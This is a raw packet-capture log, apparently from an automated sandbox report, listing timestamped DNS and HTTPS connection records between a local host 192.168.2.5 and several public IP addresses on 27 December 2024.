                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.956969976 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.957132101 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.957149982 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.958142996 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.272936106 CET49923443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.273982048 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.274172068 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.274244070 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275628090 CET44349928172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275705099 CET44349928172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275772095 CET49928443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275985003 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.276171923 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.276226997 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.314702988 CET44349927172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.314857006 CET44349927172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.315054893 CET49927443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.348676920 CET44349926172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.348730087 CET44349926172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.348814011 CET49926443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684098959 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684396982 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684416056 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684762001 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685055017 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685120106 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685250044 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685306072 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685334921 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.861473083 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.861814976 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.861881018 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862266064 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862663984 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862782001 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862863064 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862937927 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862984896 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.120671988 CET44349933172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.120726109 CET44349933172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.120774984 CET49933443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.157706976 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.157763958 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.157823086 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.357604980 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.358050108 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.358081102 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359085083 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359165907 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359519005 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359575033 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359728098 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359738111 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359790087 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359807968 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.408473015 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.440702915 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.440781116 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.440871954 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.441459894 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.441478014 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.605516911 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.605798960 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.605839968 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.606846094 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.606934071 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607249975 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607307911 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607403040 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607419014 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607491970 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.607522011 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.658379078 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.665400982 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.665489912 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.666023016 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.666033983 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.667849064 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.667855024 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700431108 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700578928 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700921059 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700937033 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700956106 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.700982094 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.974711895 CET4435002520.189.173.1192.168.2.5
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:18.930006981 CET53575861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:20.946927071 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.257649899 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.859539986 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.958013058 CET6243553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.958115101 CET6348153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.960062981 CET5633053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:21.960278988 CET5362353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.068859100 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.095556021 CET53634811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.097734928 CET53624351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.116400957 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.116547108 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.117027044 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.117137909 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.117703915 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.118860006 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.128540993 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.160511017 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.189304113 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.378279924 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.441926956 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.442116976 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.442135096 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.442143917 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.446154118 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.446233034 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.454850912 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457261086 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457356930 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457765102 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.457875967 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.464467049 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.464648008 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.467776060 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.474001884 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.485205889 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.485707045 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.486430883 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.486957073 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.487087011 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.487211943 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.491405964 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.504235029 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.769037962 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.794693947 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.797528982 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.798396111 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.809274912 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.810570955 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.811012030 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.814814091 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.815417051 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.820427895 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.827667952 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.828525066 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.839493990 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.842108965 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.842526913 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.863421917 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:22.988112926 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.143656015 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.144304991 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.164122105 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.166445017 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.167090893 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.167105913 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.168071985 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.168247938 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.168359041 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192141056 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192152977 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192162037 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.192460060 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245683908 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245698929 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245712042 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.245784998 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.246315002 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.247632980 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.249186993 CET52991443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:23.320745945 CET44352991172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.122895956 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.126483917 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.131342888 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.131576061 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.141048908 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.149441957 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.149602890 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.158965111 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.167350054 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.167515039 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.176189899 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.189030886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.189219952 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.214214087 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.215964079 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.216114998 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.216753006 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.220757008 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.221095085 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.229664087 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.257410049 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.257432938 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.257446051 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.257647038 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.257714987 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.265692949 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.281955004 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.282186031 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.286159039 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.288163900 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.301490068 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.301687956 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.301906109 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.315644979 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.315879107 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.326214075 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.328068018 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.328243017 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.336966991 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.346157074 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.346359015 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.355068922 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.364284039 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.365145922 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.373795986 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.382905006 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.383146048 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.390289068 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.399125099 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.399328947 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.412179947 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.420993090 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.421209097 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.426373005 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.435477018 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.435648918 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.445033073 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.453476906 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.453660965 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.462950945 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.473640919 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.473822117 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.480669975 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.489567041 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.489782095 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.497972012 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.507536888 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.508462906 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.527132988 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.527219057 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.527339935 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.534198999 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.542752981 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.543087959 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.551973104 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.581377029 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.581943035 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.584079027 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.585572958 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.585743904 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.586919069 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:29.605107069 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310674906 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310686111 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310695887 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310801983 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310813904 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310822010 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.310955048 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.314183950 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.314393997 CET4436396823.200.88.9192.168.2.5
